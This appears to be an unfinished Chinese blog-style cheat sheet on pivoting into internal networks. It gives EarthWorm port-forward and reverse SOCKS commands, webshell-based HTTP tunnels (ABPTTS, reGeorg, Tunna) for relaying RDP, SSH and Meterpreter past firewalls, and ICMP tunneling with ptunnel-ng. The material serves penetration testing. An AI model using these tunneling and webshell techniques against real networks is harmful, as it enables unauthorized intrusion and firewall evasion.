多级内网穿透

SOCK通道：ew

1 2	> EarthWorm是一种用于开启SOCKS v5代理服务的工具，基于标准C开发，可提供多平台间的转接通讯，用于复杂网络环境下的数据转发。 >

通过本地设置sock代理进行流量转发。

* 将本机1090转发到本地1080。
ew_for_Win.exe -s lcx_listen -l 1090 -e 1080
* 将1090收到的流量转发到本地的1080
ew_for_Win.exe -s lcx_listen -l 1090 -e 1080
* 把1090端口收到的流量转发到，192.168.1.1的1080端口
ew_for_Win.exe -s lcx_tran -l 1090 -f 192.168.1.1 -g 1080 
* 对192.168.2.1的1080端口与1090端口间的流量从本机进行转发
ew_for_Win.exe -s lcx_slave -d 192.168.2.1 -e 1080 -f 192.168.1.1 -g 1090
* 把内网主机反向代理到公网主机的1024端口。
ew_for_Win.exe -s rssocks -d 10.xxx.xxx.xx -e 1024

HTTP隧道： abptts

项目地址： https://github.com/nccgroup/ABPTTS

ABPTTS使用Python客户端脚本和Web应用程序服务器页面，通过HTTP/HTTPS连接将TCP通信通过隧道传输到Web应用程序服务器。换句话说，在任何可以部署Web Shell的地方，都能够建立完整的TCP隧道。这允许通过Web应用程序服务器建立RDP，交互式SSH，Meterpreter和其他连接。这些通信设计是与HTTP标准完全兼容的，这意味着除了隧道在通过目标Web应用程序服务器，它可以被用来建立一个出站通过分组检查防火墙连接。

1
2
3

python abpttsfactory.py -o webshell
* 将目标的3389端口转发到本地1024端口
python abpttsclient.py -c config.txt -u "http://********/abptts.aspx" -f 127.0.0.1:1024/********:3389

HTTP隧道：reGeorg

项目地址：https://github.com/sensepost/reGeorg

reDuh的后继者，堡垒网络服务器，并通过DMZ创建SOCKS代理。只要将JSP/PHP/ASP/ASPX等页面上传到目标服务器，便可以访问该服务器后面的主机。可惜的是，大部分waf都会针对默认的reGeorg。

1 2	* 将目标流量转发到本机的8080端口，本机为192.168.1.1 python reGeorgSocksProxy.py ‐p 8080 ‐l 192.168.1.1 ‐u http://********/tunnel.aspx

HTTP隧道：Tunna

项目地址： https://github.com/SECFORCE/Tunna

此webshell可用于连接到远程主机上的任何服务。这将是远程主机上本地端口上的本地连接，并且被防火墙允许。webshell从服务端口读取数据，并通过HTTP封装它们，并将其作为HTTP响应发送到本地代理。本地代理将解包并将数据写入客户端程序将要连接到的本地端口。当本地代理在本地端口上接收数据时，它将作为HTTP Post发送到Webshell。该Webshell将从HTTP Post中读取数据并将其放在服务端口上，并重复转发，整个通信（外部）是通过HTTP协议完成的。

1 2	* 将远程主机3389端口转发到本地1024端口。 python proxy.py ‐u http://192.168.1.1/Tunna.aspx ‐l 1024 ‐r 3389 ‐s ‐v

ICMP隧道：ptunnel-ng

项目地址： https://github.com/lnslbrty/ptunnel-ng

在禁止udp/tcp通信的时候，可以利用icmp隧道进行穿透那些禁止udp/tcp端口通信的环境。


./ptunnel-ng -r<destination address> -R<destination port> -v <loglevel> -P<password> -u<user> -g<group>

./ptunnel-ng -p <address> -l <listen port> -r<destination address> -R<destination port> -v <loglevel> -P<password> -u<user> -g<group>

未完待续。。。。。